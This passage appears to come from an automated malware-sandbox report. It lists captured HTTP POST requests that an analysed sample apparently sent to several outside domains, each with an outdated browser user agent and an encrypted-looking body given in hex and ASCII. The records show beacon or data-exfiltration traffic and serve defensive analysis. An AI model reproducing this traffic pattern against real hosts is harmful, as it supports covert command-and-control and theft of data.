75 59 58 6b 6e 77 32 50 32 74 44 66 57 55 4d 30 68 70 6e 4a 63 51 4c 35 45 4d 2b 68 6b 6d 36 51 42 43 2b 64 2b 70 72 50 61 49 30 5a 56 65 67 79 50 52 42 6d 45 6c 33 4d 52 44 54 4d 45 67 30 42 43 4a 52 4b 6e 44 38 2f 33 54 43 51 73 67 4f 56 6e 5a 69 4c 68 4a 73 54 50 77 32 57 62 32 55 31 66 45 77 4e 64 35 61 55 41 2b 4e 62 77 79 6a 39 4a 73 6c 33 6f 69 77 55 72 39 53 78 71 58 6e 31 45 62 6e 4f 44 65 74 6f 55 51 76 78 4b 46 67 53 45 6f 68 41 76 77 75 4d 43 70 75 41 4f 63 51 49 56 49 43 46 74 54 6e 5a 47 4f 6c 30 68 61 57 44 58 6e 2b 59 68 74 37 58 36 41 53 34 52 2b 50 66 47 4d 35 74 5a 65 44 73 34 59 2f 35 56 73 34 6e 35 2f 4a 56 6f 49 48 79 6b 51 67 77 50 69 50 79 63 76 31 69 31 66 77 6c 37 70 49 4b 68 30 72 74 66 42 31 33 6a 4e 71 79 63 4b 7a 4a 45 33 48 54 4e 52 2b 7a 36 63 69 33 56 48 55 61 52 6e 2f 62 58 67 2b 6d 2f 4c 64 30 30 75 68 4a 38 62 49 52 63 49 4e 55 4a 63 4d 70 4f 63 61 68 49 30 31 76 53 57 53 6a 6f 61 43 2b 6b 44 68 69 4e Data Ascii: huuvat+D3pNg4yVdPn8NSGhZYb61BQ2fg5lnYAQdCpybCUFdQD9p5CcMrr7Te0tmL2qaM7mUnrUQJE5mXsoW5aKjv1LdY+WocXpajtv/LWIJhbvcOXPVSSMbbORroKhwgYVkcLb3j3HB8iqcVP+pyzmHsxRzN2OuBcNRT/joeIxjjYyz3u8/zppt+JUHT4NbAeWxakEGiYaUlk6rPXNof3x+evLXT4NuYXknw2P2tDfWUM0hpnJcQL5EM+hkm6QBC+d+prPaI0ZVegyPRBmEl3MRDTMEg0BCJRKnD8/3TCQsgOVnZiLhJsTPw2Wb2U1fEwNd5aUA+Nbwyj9Jsl3oiwUr9SxqXn1EbnODetoUQvxKFgSEohAvwuMCpuAOcQIVICFtTnZGOl0haWDXn+Yht7X6AS4R+PfGM5tZeDs4Y/5Vs4n5/JVoIHykQgwPiPycv1i1fwl7pIKh0rtfB13jNqycKzJE3HTNR+z6ci3VHUaRn/bXg+m/Ld00uhJ8bIRcINUJcMpOcahI01vSWSjoaC+kDhiN
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 64 35 70 38 6d 35 49 5a 34 4a 4d 71 65 33 54 77 52 57 74 43 69 4a 57 41 59 53 58 69 35 4e 32 38 35 69 6a 38 32 2f 37 57 66 54 74 6d 41 75 48 48 38 50 64 49 66 48 4c 72 65 78 6d 79 51 67 43 4a 64 7a 34 72 45 4f 45 74 7a 68 62 2f 36 62 47 77 36 34 6b 63 74 34 30 55 7a 63 75 48 6e 35 42 79 67 68 78 6c 38 6b 51 62 37 65 33 77 61 6b 64 57 43 58 77 2f 6a 36 73 59 77 6a 5a 39 6d 67 37 33 2b 2b 4b 68 47 66 68 48 77 62 32 71 73 46 58 47 43 42 57 67 45 38 35 73 55 61 7a 4b 64 2b 6e 77 6b 55 72 79 72 64 65 4e 6e 2b 34 53 78 2f 36 77 78 36 32 2f 36 55 32 5a 52 6b 67 44 53 55 76 54 67 74 31 50 4b 53 66 63 66 4d 50 5a 4b 4f 76 6d 57 57 6a 49 4d 55 7a 64 70 37 57 39 56 65 58 32 50 68 55 78 36 7a 4d 30 64 68 33 78 62 52 67 68 75 4b 75 74 43 38 50 76 64 30 53 65 30 32 66 51 38 6a 58 61 65 4b 74 5a 6d 4d 68 76 44 2b 6a 74 4e 4e 63 59 54 7a 64 79 47 31 2b 75 4c 52 72 4f 32 55 53 42 33 66 66 4c 67 72 36 71 4a 50 31 30 65 37 35 57 73 62 71 33 36 72 56 57 6f 54 4d 4a 59 65 46 7a 48 38 73 75 33 55 66 37 6c 51 38 46 77 79 31 74 78 6c 6c 36 33 4b 34 50 76 4d 68 65 57 77 72 4d 44 2b 37 36 42 35 4d 64 73 4e 78 46 35 57 64 39 6e 59 52 4a 65 41 38 4c 52 55 2b 2b 59 48 73 50 68 2b 2f 51 39 67 75 4b 57 42 69 74 69 6b 50 62 30 52 74 76 4c 62 6d 4c 6e 7a 47 47 62 46 37 66 4e 45 38 69 61 75 6a 52 75 39 38 32 53 59 44 47 79 61 65 32 51 55 4e 2b 72 72 52 4e 67 61 44 33 73 61 58 52 4a 6a 2b 74 46 56 71 5a 68 61 72 36 64 74 76 31 48 46 72 48 48 56 42 34 69 51 72 61 47 76 47 49 56 66 6d 6f 30 6d 4c 70 39 6b 43 5a 6f 75 6d 6d 33 34 55 41 39 47 2f 42 65 68 6e 50 52 37 6a 77 4c 39 56 50 4d 6b 71 76 67 6f 53 54 73 6c 4c 64 6e 79 67 65 43 2f 33 43 5a 69 67 78 74 4b 46 73 36 41 3d 3d Data Ascii: d5p8m5IZ4JMqe3TwRWtCiJWAYSXi5N285ij82/7WfTtmAuHH8PdIfHLrexmyQgCJdz4rEOEtzhb/6bGw64kct40UzcuHn5Byghxl8kQb7e3wakdWCXw/j6sYwjZ9mg73++KhGfhHwb2qsFXGCBWgE85sUazKd+nwkUryrdeNn+4Sx/6wx62/6U2ZRkgDSUvTgt1PKSfcfMPZKOvmWWjIMUzdp7W9VeX2PhUx6zM0dh3xbRghuKutC8Pvd0Se02fQ8jXaeKtZmMhvD+jtNNcYTzdyG1+uLRrO2USB3ffLgr6qJP10e75Wsbq36rVWoTMJYeFzH8su3Uf7lQ8Fwy1txll63K4PvMheWwrMD+76B5MdsNxF5Wd9nYRJeA8LRU++YHsPh+/Q9guKWBitikPb0RtvLbmLnzGGbF7fNE8iaujRu982SYDGyae2QUN+rrRNgaD3saXRJj+tFVqZhar6dtv1HFrHHVB4iQraGvGIVfmo0mLp9kCZoumm34UA9G/BehnPR7jwL9VPMkqvgoSTslLdnygeC/3CZigxtKFs6A==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 70 46 2f 42 69 6e 69 4f 33 35 4f 7a 71 6c 4b 49 2b 2f 39 45 75 32 74 55 57 43 2f 41 2b 72 4e 47 4c 4f 6e 66 74 4a 31 56 4d 31 6f 5a 77 47 4a 54 70 56 6c 53 6d 59 44 33 37 70 59 38 51 48 4b 41 46 62 6a 4f 35 38 77 2f 5a 34 48 38 43 51 37 4a 61 37 69 33 53 37 39 62 57 34 53 70 39 4b 43 4a 4f 66 54 4a 61 64 7a 6c 78 6a 39 37 52 68 72 65 50 4e 4b 79 61 57 4b 63 67 73 57 65 4b 39 76 35 4a 7a 4e 58 55 73 66 53 43 52 49 78 2b 64 4f 61 5a 6c 46 66 76 37 54 49 79 71 74 49 76 6d 33 76 50 49 57 75 31 44 42 4c 4d 78 63 33 61 4a 6c 70 36 39 37 2b 48 49 6b 63 4d 73 41 39 49 6a 44 52 36 6c 61 36 73 6d 62 70 62 41 41 6e 4b 54 63 6f 43 37 45 70 56 30 69 73 63 49 4d 52 6d 77 4a 2f 6a 47 30 49 43 33 51 6b 41 6c 66 46 30 43 4f 37 79 47 38 4f 48 33 33 70 2b 2f 37 4d 45 34 77 6a 57 45 35 50 59 7a 47 36 48 2b 79 4a 50 4e 4f 6b 4a 35 61 46 36 4f 46 54 66 51 58 45 68 53 70 7a 46 4d 4c 55 39 4f 6a 64 6c 5a 54 6d 4b 76 64 58 36 75 4c 49 5a 63 53 37 53 58 2b 34 4a 67 41 71 30 53 32 75 34 69 49 4f 54 34 55 54 51 62 63 4c 65 49 73 33 32 6b 6a 39 58 54 50 68 61 4e 49 31 7a 4f 70 67 54 46 41 71 7a 65 4a 4e 6e 75 33 36 7a 71 36 48 51 4f 63 63 6c 5a 68 59 4c 6b 38 4d 48 33 43 70 43 33 44 31 4c 51 35 41 43 55 49 70 4d 42 6d 63 52 62 33 64 2f 63 30 57 5a 78 50 53 68 48 59 6b 6e 35 69 66 2b 2f 31 34 51 71 65 77 5a 31 77 55 68 74 46 62 32 72 46 43 34 55 44 37 2b 42 6e 71 65 48 6c 43 77 30 72 61 79 67 35 31 4d 51 38 6e 67 6a 59 53 58 55 52 4b 56 63 33 54 4e 47 70 34 70 6a 5a 42 4b 4a 67 72 76 70 69 35 6c 69 57 62 5a 6d 41 2b 55 31 67 47 42 67 76 35 41 53 66 77 2b 44 6e 61 65 4c 66 51 5a 76 54 35 78 79 38 4c 6c 42 6c 34 67 31 43 6b 75 6c 76 79 42 77 3d 3d Data Ascii: pF/BiniO35OzqlKI+/9Eu2tUWC/A+rNGLOnftJ1VM1oZwGJTpVlSmYD37pY8QHKAFbjO58w/Z4H8CQ7Ja7i3S79bW4Sp9KCJOfTJadzlxj97RhrePNKyaWKcgsWeK9v5JzNXUsfSCRIx+dOaZlFfv7TIyqtIvm3vPIWu1DBLMxc3aJlp697+HIkcMsA9IjDR6la6smbpbAAnKTcoC7EpV0iscIMRmwJ/jG0IC3QkAlfF0CO7yG8OH33p+/7ME4wjWE5PYzG6H+yJPNOkJ5aF6OFTfQXEhSpzFMLU9OjdlZTmKvdX6uLIZcS7SX+4JgAq0S2u4iIOT4UTQbcLeIs32kj9XTPhaNI1zOpgTFAqzeJNnu36zq6HQOcclZhYLk8MH3CpC3D1LQ5ACUIpMBmcRb3d/c0WZxPShHYkn5if+/14QqewZ1wUhtFb2rFC4UD7+BnqeHlCw0rayg51MQ8ngjYSXURKVc3TNGp4pjZBKJgrvpi5liWbZmA+U1gGBgv5ASfw+DnaeLfQZvT5xy8LlBl4g1CkulvyBw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 72 35 6b 73 6e 7a 6b 34 34 4a 4e 6c 54 4a 43 59 79 49 54 4a 6b 74 4c 41 41 65 59 58 67 73 43 6b 66 54 36 6c 55 39 58 37 53 61 70 67 76 67 44 77 7a 37 46 50 4b 4a 73 4d 69 69 35 4f 5a 49 4f 61 56 4b 66 57 6e 54 63 6c 31 6f 50 68 6d 4e 61 35 41 36 2f 5a 4e 30 57 57 2b 34 42 2f 31 6a 70 44 75 43 46 58 6a 66 79 38 34 7a 35 48 59 56 6e 75 49 2b 73 2f 2b 47 6a 47 42 4e 6f 66 67 6c 70 6a 67 4d 6d 2f 6d 57 37 6d 6b 52 4a 6b 43 33 52 70 54 36 61 64 47 63 48 52 72 57 57 6a 47 48 4f 71 36 73 42 6c 46 47 31 69 6f 56 59 42 43 45 67 4a 64 6c 41 70 6c 2b 37 71 4a 34 36 6c 6a 45 51 42 2b 6a 2f 49 73 52 37 43 6a 6c 4d 42 33 68 71 68 78 32 38 67 4c 59 6b 49 48 30 66 57 51 71 68 74 50 36 38 6f 44 51 52 6d 4a 47 59 74 79 58 77 6e 6d 39 63 59 31 4c 5a 51 34 73 4d 43 77 68 72 4f 77 37 72 30 49 50 70 39 54 67 67 56 7a 6a 6e 4e 75 45 66 62 6a 69 42 4c 4a 50 73 73 41 43 71 30 54 49 63 4e 2f 6c 47 4a 49 36 53 75 43 2b 63 54 6e 43 79 4d 6a 64 35 44 6d 46 65 47 48 64 43 68 49 2b 62 50 41 6c 4f 54 33 37 37 59 79 55 34 72 38 4b 70 74 68 6e 68 34 6f 31 38 43 73 57 4e 78 77 6f 75 59 4d 51 30 6c 31 53 31 37 41 76 43 4e 55 45 57 6a 53 58 4b 6f 39 49 41 74 4f 61 79 6c 58 49 50 37 46 77 49 33 34 71 63 79 35 4c 46 58 6b 70 79 75 2f 65 62 38 35 6c 79 6f 71 54 2f 46 51 6d 69 76 63 59 47 4b 32 58 7a 34 4a 32 38 62 5a 6a 70 77 53 35 56 69 73 61 50 46 72 39 55 42 4a 74 67 4e 6d 71 6f 44 46 66 2b 75 51 2f 63 6d 7a 6b 74 6d 2f 67 62 58 4a 37 6a 52 4c 2f 75 6f 73 62 69 53 4e 55 48 68 4d 72 53 69 73 36 64 71 55 48 2b 76 34 34 2f 6d 39 48 39 36 56 64 76 47 34 58 56 6f 77 66 43 4e 61 78 55 4e 55 5a 4e 78 64 30 7a 63 51 64 76 48 30 6e 4c 53 6e 32 32 48 78 67 55 56 4b 56 37 78 2b 2f 6b 57 6a 71 39 6d 35 53 4b 41 5a 44 7a 38 56 31 7a 34 53 56 56 41 44 51 43 50 66 34 47 73 49 46 67 63 2f 41 74 37 Data Ascii: r5ksnzk44JNlTJCYyITJktLAAeYXgsCkfT6lU9X7SapgvgDwz7FPKJsMii5OZIOaVKfWnTcl1oPhmNa5A6/ZN0WW+4B/1jpDuCFXjfy84z5HYVnuI+s/+GjGBNofglpjgMm/mW7mkRJkC3RpT6adGcHRrWWjGHOq6sBlFG1ioVYBCEgJdlApl+7qJ46ljEQB+j/IsR7CjlMB3hqhx28gLYkIH0fWQqhtP68oDQRmJGYtyXwnm9cY1LZQ4sMCwhrOw7r0IPp9TggVzjnNuEfbjiBLJPssACq0TIcN/lGJI6SuC+cTnCyMjd5DmFeGHdChI+bPAlOT377YyU4r8Kpthnh4o18CsWNxwouYMQ0l1S17AvCNUEWjSXKo9IAtOaylXIP7FwI34qcy5LFXkpyu/eb85lyoqT/FQmivcYGK2Xz4J28bZjpwS5VisaPFr9UBJtgNmqoDFf+uQ/cmzktm/gbXJ7jRL/uosbiSNUHhMrSis6dqUH+v44/m9H96VdvG4XVowfCNaxUNUZNxd0zcQdvH0nLSn22HxgUVKV7x+/kWjq9m5SKAZDz8V1z4SVVADQCPf4GsIFgc/At7
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 4d 65 45 47 5a 48 31 4d 33 70 50 2f 2f 31 66 72 4e 4b 4e 6e 79 62 61 52 35 62 36 72 4e 64 48 54 41 64 58 38 6a 6b 36 59 64 45 34 64 4e 34 2f 58 4e 59 6b 36 41 37 58 63 53 73 49 70 76 4b 61 46 57 31 51 6c 66 2f 7a 6f 37 6f 48 44 59 6e 65 68 4d 32 66 66 6b 65 45 68 4b 39 6b 71 43 53 39 51 6f 71 71 65 78 46 33 68 56 68 6b 50 2b 59 46 48 33 69 50 34 55 41 34 56 37 6d 64 4c 63 6c 4b 64 4f 48 4a 68 75 53 34 47 4f 4a 55 69 45 54 37 33 59 36 42 45 32 44 50 63 39 6f 69 58 75 4a 70 48 6e 76 54 39 76 65 39 76 2b 63 49 78 34 64 48 4b 70 69 63 6a 33 48 37 6d 74 70 6e 46 70 48 4b 4b 77 30 72 6f 44 66 31 64 57 4f 4b 6f 79 65 30 58 66 42 56 4d 5a 76 34 32 32 48 36 6a 32 37 6a 56 69 69 52 58 39 50 30 33 4c 66 4c 30 33 57 6e 65 30 57 79 76 33 4b 65 54 75 41 30 50 4c 58 67 2f 75 58 69 37 34 64 37 79 49 49 30 6b 70 2f 61 50 6b 33 73 4e 36 6b 39 79 77 38 6e 78 77 62 32 41 35 47 38 79 75 71 66 77 32 59 6c 77 6f 38 67 72 2f 58 68 46 62 62 76 57 67 50 33 67 42 78 6f 31 6d 64 69 68 67 4f 52 6d 70 73 75 6a 37 62 52 47 76 35 4e 62 51 57 4b 70 50 61 6c 71 32 4c 64 47 7a 63 61 56 46 6d 2b 5a 4e 33 30 4d 31 73 4d 78 34 59 78 72 72 64 62 52 56 66 32 74 79 42 55 4d 43 59 64 44 48 64 46 4e 61 36 34 49 61 6e 36 32 37 64 57 74 4d 76 6d 4d 5a 36 2f 6b 4f 59 33 73 75 50 54 75 43 52 4e 37 30 75 48 66 56 5a 7a 6b 4e 4c 64 5a 52 53 68 38 31 76 39 61 65 77 6a 48 2f 6b 56 42 39 31 76 42 30 4f 48 53 61 67 4f 44 2b 4f 51 6a 4e 30 39 38 7a 75 75 64 37 4d 69 70 39 36 53 43 61 56 53 45 6c 64 4c 5a 76 72 47 42 2b 34 36 44 45 7a 76 56 6d 62 77 66 57 76 30 4f 52 67 37 61 43 33 63 4d 75 48 30 6d 72 57 46 66 54 7a 34 35 63 77 7a 67 46 6d 52 72 66 66 48 34 38 50 41 4c 2b 41 4c 51 6c 67 6e 66 73 77 4e 75 6b 45 67 3d Data Ascii: MeEGZH1M3pP//1frNKNnybaR5b6rNdHTAdX8jk6YdE4dN4/XNYk6A7XcSsIpvKaFW1Qlf/zo7oHDYnehM2ffkeEhK9kqCS9QoqqexF3hVhkP+YFH3iP4UA4V7mdLclKdOHJhuS4GOJUiET73Y6BE2DPc9oiXuJpHnvT9ve9v+cIx4dHKpicj3H7mtpnFpHKKw0roDf1dWOKoye0XfBVMZv422H6j27jViiRX9P03LfL03Wne0Wyv3KeTuA0PLXg/uXi74d7yII0kp/aPk3sN6k9yw8nxwb2A5G8yuqfw2Ylwo8gr/XhFbbvWgP3gBxo1mdihgORmpsuj7bRGv5NbQWKpPalq2LdGzcaVFm+ZN30M1sMx4YxrrdbRVf2tyBUMCYdDHdFNa64Ian627dWtMvmMZ6/kOY3suPTuCRN70uHfVZzkNLdZRSh81v9aewjH/kVB91vB0OHSagOD+OQjN098zuud7Mip96SCaVSEldLZvrGB+46DEzvVmbwfWv0ORg7aC3cMuH0mrWFfTz45cwzgFmRrffH48PAL+ALQlgnfswNukEg=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.baijaku.comCache-Control: no-cacheData Raw: 5a 76 58 68 61 6e 79 46 33 70 50 6c 68 30 33 54 4a 79 49 48 63 51 2f 61 54 6a 51 55 36 4f 4e 6e 63 48 59 52 71 67 61 52 62 56 4f 52 6b 75 62 78 58 4e 33 4a 71 6b 75 46 4d 64 6f 6d 42 76 31 70 4d 76 77 50 5a 53 42 56 2f 55 53 30 4b 4b 49 54 4e 69 4d 43 51 36 47 33 56 65 45 70 71 66 69 69 77 30 2b 45 42 4d 31 46 79 52 6b 4f 55 70 57 79 48 6d 32 54 34 63 47 4d 71 30 6c 52 34 4c 6a 47 77 54 36 4d 6d 7a 41 30 49 39 4b 47 72 47 67 79 4e 4f 36 38 73 47 30 53 4a 31 7a 37 59 4a 52 54 6b 4f 72 48 49 53 39 38 6b 39 71 39 4e 62 54 33 64 51 4f 2b 57 62 42 72 35 53 49 49 58 72 50 6a 71 65 37 79 4e 78 4e 6a 56 34 74 75 6e 54 73 62 72 74 48 35 68 4f 31 72 50 44 42 2f 72 30 43 4c 7a 56 30 38 59 52 77 39 56 63 68 30 66 69 41 79 34 53 51 4c 51 37 41 49 2b 50 52 6f 43 4c 2f 68 51 42 4a 34 35 30 53 32 7a 4a 67 43 37 69 79 57 72 41 44 56 69 56 4f 56 43 78 37 36 49 66 55 4b 45 59 2f 44 58 42 4f 74 53 53 59 45 42 52 35 62 30 72 74 39 46 4f 46 45 43 73 6a 4a 78 75 6c 77 68 71 6a 57 75 75 4f 39 79 69 4e 39 34 68 41 43 77 4e 4d 6a 72 50 34 45 77 37 54 50 7a 56 44 66 50 64 65 41 7a 71 68 6f 2b 46 36 58 73 50 59 4c 68 4d 37 35 49 43 7a 2f 61 59 51 58 55 35 4d 34 70 69 56 33 53 70 2f 30 6b 63 36 39 55 6a 31 63 53 6b 65 74 36 37 47 79 6e 55 30 4a 42 46 2b 4a 7a 52 70 5a 52 4c 75 6b 31 2b 42 43 63 55 4a 44 41 7a 31 71 65 75 67 31 64 63 4b 4d 4e 57 72 6f 43 71 73 61 61 59 56 44 51 72 45 77 45 68 31 30 7a 58 63 77 37 77 33 78 50 2b 4b 72 6c 4d 37 53 72 47 47 44 74 6f 58 48 52 6f 6e 4f 54 2b 65 61 6f 53 6a 64 69 6e 48 4d 44 45 45 61 49 50 64 6a 36 5a 4e 6e 66 41 4b 74 66 78 61 75 6b 38 4b 6a 35 52 50 49 73 51 47 78 54 6a 4d 31 Data Ascii: ZvXhanyF3pPlh03TJyIHcQ/aTjQU6ONncHYRqgaRbVORkubxXN3JqkuFMdomBv1pMvwPZSBV/US0KKITNiMCQ6G3VeEpqfiiw0+EBM1FyRkOUpWyHm2T4cGMq0lR4LjGwT6MmzA0I9KGrGgyNO68sG0SJ1z7YJRTkOrHIS98k9q9NbT3dQO+WbBr5SIIXrPjqe7yNxNjV4tunTsbrtH5hO1rPDB/r0CLzV08YRw9Vch0fiAy4SQLQ7AI+PRoCL/hQBJ450S2zJgC7iyWrADViVOVCx76IfUKEY/DXBOtSSYEBR5b0rt9FOFECsjJxulwhqjWuuO9yiN94hACwNMjrP4Ew7TPzVDfPdeAzqho+F6XsPYLhM75ICz/aYQXU5M4piV3Sp/0kc69Uj1cSket67GynU0JBF+JzRpZRLuk1+BCcUJDAz1qeug1dcKMNWroCqsaaYVDQrEwEh10zXcw7w3xP+KrlM7SrGGDtoXHRonOT+eaoSjdinHMDEEaIPdj6ZNnfAKtfxauk8Kj5RPIsQGxTjM1
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wkhk.netCache-Control: no-cacheCookie: snkz=191.96.150.209; btst=ae131e7aa937662b5fde5704c0a367ca|191.96.150.209|1694755584|1694755566|9|2|0Data Raw: 6c 74 78 44 72 41 36 6c 34 4a 50 4f 4b 52 39 62 6d 65 6e 34 58 6e 45 6c 2f 76 34 4f 2f 50 31 4d 49 74 62 45 6f 31 67 46 66 54 72 37 45 64 75 37 55 5a 4c 66 5a 4e 30 50 74 73 70 31 6e 67 7a 62 38 42 31 44 6c 4b 56 42 4b 51 62 34 61 53 35 64 4e 4c 33 72 34 70 69 38 53 52 61 4e 70 58 41 43 69 64 63 4a 59 59 36 74 52 6a 69 2b 78 35 34 50 4f 62 30 64 68 37 32 53 6f 5a 6c 41 62 44 63 42 43 45 5a 59 59 43 47 47 6b 35 66 30 39 50 67 4a 4b 79 6b 6a 37 6c 48 54 57 56 68 34 48 37 32 39 30 47 52 34 46 30 52 68 52 31 53 56 61 65 2b 64 36 43 34 70 6f 4f 54 74 36 72 6c 51 76 4a 75 4c 59 35 74 30 4f 6d 6e 71 4e 30 45 62 37 47 4c 70 4a 58 61 31 44 7a 4c 52 39 38 39 4a 73 4c 6c 61 48 72 39 49 66 49 79 4f 58 4a 39 36 58 55 49 41 2f 41 44 77 38 50 77 50 4f 6e 4c 62 57 2b 49 66 30 47 42 33 30 47 51 45 4b 45 58 54 4c 4c 34 6c 53 30 48 2f 34 4f 59 59 77 67 52 63 79 4a 48 46 65 2b 44 69 47 6d 72 4c 4c 43 49 2b 67 42 57 47 4b 41 32 4d 4e 78 68 37 65 61 35 4d 46 79 76 55 56 73 43 78 74 33 61 6a 36 69 7a 31 30 54 51 49 69 50 73 46 36 75 35 2f 65 71 6f 52 67 58 66 38 36 37 64 4a 72 6b 4b 73 30 66 6e 74 4f 55 34 54 30 4c 50 53 39 57 70 6e 35 44 63 67 46 39 69 31 5a 57 6f 43 38 36 6f 6a 46 6d 66 78 4c 47 45 79 76 4e 75 76 2b 6f 55 6d 4b 34 78 48 54 2b 54 6e 31 38 78 55 32 31 4a 35 5a 55 58 53 4b 6c 64 51 6d 4a 74 74 6f 4d 66 62 31 76 2b 36 76 2f 39 6c 42 4c 33 41 46 44 69 33 45 4f 73 66 48 59 67 4d 37 31 45 52 72 65 37 47 54 6c 73 45 69 62 68 69 56 38 6a 5a 56 73 4f 61 31 62 64 42 2b 7a 6e 6f 72 43 62 52 6e 37 75 66 6d 52 2f 41 4c 31 7a 72 76 38 2b 4f 78 72 52 4b 77 7a 6e 6d 34 36 6c 6c 68 4c 32 2f 53 2f 74 6f 53 53 54 54 51 48 54 6a 74 52 4f 4b 45 34 6c 64 61 69 35 39 39 32 6f 5a 55 45 35 65 56 59 76 69 2f 30 6a 34 Data Ascii: ltxDrA6l4JPOKR9bmen4XnEl/v4O/P1MItbEo1gFfTr7Edu7UZLfZN0Ptsp1ngzb8B1DlKVBKQb4aS5dNL3r4pi8SRaNpXACidcJYY6tRji+x54POb0dh72SoZlAbDcBCEZYYCGGk5f09PgJKykj7lHTWVh4H7290GR4F0RhR1SVae+d6C4poOTt6rlQvJuLY5t0OmnqN0Eb7GLpJXa1DzLR989JsLlaHr9IfIyOXJ96XUIA/ADw8PwPOnLbW+If0GB30GQEKEXTLL4lS0H/4OYYwgRcyJHFe+DiGmrLLCI+gBWGKA2MNxh7ea5MFyvUVsCxt3aj6iz10TQIiPsF6u5/eqoRgXf867dJrkKs0fntOU4T0LPS9Wpn5DcgF9i1ZWoC86ojFmfxLGEyvNuv+oUmK4xHT+Tn18xU21J5ZUXSKldQmJttoMfb1v+6v/9lBL3AFDi3EOsfHYgM71ERre7GTlsEibhiV8jZVsOa1bdB+znorCbRn7ufmR/AL1zrv8+OxrRKwznm46llhL2/S/toSSTTQHTjtROKE4ldai5992oZUE5eVYvi/0j4
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 64 35 70 38 6d 35 49 5a 34 4a 4d 71 65 33 54 77 52 57 74 43 69 4a 57 41 59 53 58 69 35 4e 32 38 35 69 6a 38 32 2f 37 57 66 54 74 6d 41 75 48 48 38 50 64 49 66 48 4c 72 65 78 6d 79 51 67 43 4a 64 7a 34 72 45 4f 45 74 7a 68 62 2f 36 62 47 77 36 34 6b 63 74 34 30 55 7a 63 75 48 6e 35 42 79 67 68 78 6c 38 6b 51 62 37 65 33 77 61 6b 64 57 43 58 77 2f 6a 36 73 59 77 6a 5a 39 6d 67 37 33 2b 2b 4b 68 47 66 68 48 77 62 32 71 73 46 58 47 43 42 57 67 45 38 35 73 55 61 7a 4b 64 2b 6e 77 6b 55 72 79 72 64 65 4e 6e 2b 34 53 78 2f 36 77 78 36 32 2f 36 55 32 5a 52 6b 67 44 53 55 76 54 67 74 31 50 4b 53 66 63 66 4d 50 5a 4b 4f 76 6d 57 57 6a 49 4d 55 7a 64 70 37 57 39 56 65 58 32 50 68 55 78 36 7a 4d 30 64 68 33 78 62 52 67 68 75 4b 75 74 43 38 50 76 64 30 53 65 30 32 66 51 38 6a 58 61 65 4b 74 5a 6d 4d 68 76 44 2b 6a 74 4e 4e 63 59 54 7a 64 79 47 31 2b 75 4c 52 72 4f 32 55 53 42 33 66 66 4c 67 72 36 71 4a 50 31 30 65 37 35 57 73 62 71 33 36 72 56 57 6f 54 4d 4a 59 65 46 7a 48 38 73 75 33 55 66 37 6c 51 38 46 77 79 31 74 78 6c 6c 36 33 4b 34 50 76 4d 68 65 57 77 72 4d 44 2b 37 36 42 35 4d 64 73 4e 78 46 35 57 64 39 6e 59 52 4a 65 41 38 4c 52 55 2b 2b 59 48 73 50 68 2b 2f 51 39 67 75 4b 57 42 69 74 69 6b 50 62 30 52 74 76 4c 62 6d 4c 6e 7a 47 47 62 46 37 66 4e 45 38 69 61 75 6a 52 75 39 38 32 53 59 44 47 79 61 65 32 51 55 4e 2b 72 72 52 4e 67 61 44 33 73 61 58 52 4a 6a 2b 74 46 56 71 5a 68 61 72 36 64 74 76 31 48 46 72 48 48 56 42 34 69 51 72 61 47 76 47 49 56 66 6d 6f 30 6d 4c 70 39 6b 43 5a 6f 75 6d 6d 33 34 55 41 39 47 2f 42 65 68 6e 50 52 37 6a 77 4c 39 56 50 4d 6b 71 76 67 6f 53 54 73 6c 4c 64 6e 79 67 65 43 2f 33 43 5a 69 67 78 74 4b 46 73 36 41 3d 3d Data Ascii: d5p8m5IZ4JMqe3TwRWtCiJWAYSXi5N285ij82/7WfTtmAuHH8PdIfHLrexmyQgCJdz4rEOEtzhb/6bGw64kct40UzcuHn5Byghxl8kQb7e3wakdWCXw/j6sYwjZ9mg73++KhGfhHwb2qsFXGCBWgE85sUazKd+nwkUryrdeNn+4Sx/6wx62/6U2ZRkgDSUvTgt1PKSfcfMPZKOvmWWjIMUzdp7W9VeX2PhUx6zM0dh3xbRghuKutC8Pvd0Se02fQ8jXaeKtZmMhvD+jtNNcYTzdyG1+uLRrO2USB3ffLgr6qJP10e75Wsbq36rVWoTMJYeFzH8su3Uf7lQ8Fwy1txll63K4PvMheWwrMD+76B5MdsNxF5Wd9nYRJeA8LRU++YHsPh+/Q9guKWBitikPb0RtvLbmLnzGGbF7fNE8iaujRu982SYDGyae2QUN+rrRNgaD3saXRJj+tFVqZhar6dtv1HFrHHVB4iQraGvGIVfmo0mLp9kCZoumm34UA9G/BehnPR7jwL9VPMkqvgoSTslLdnygeC/3CZigxtKFs6A==
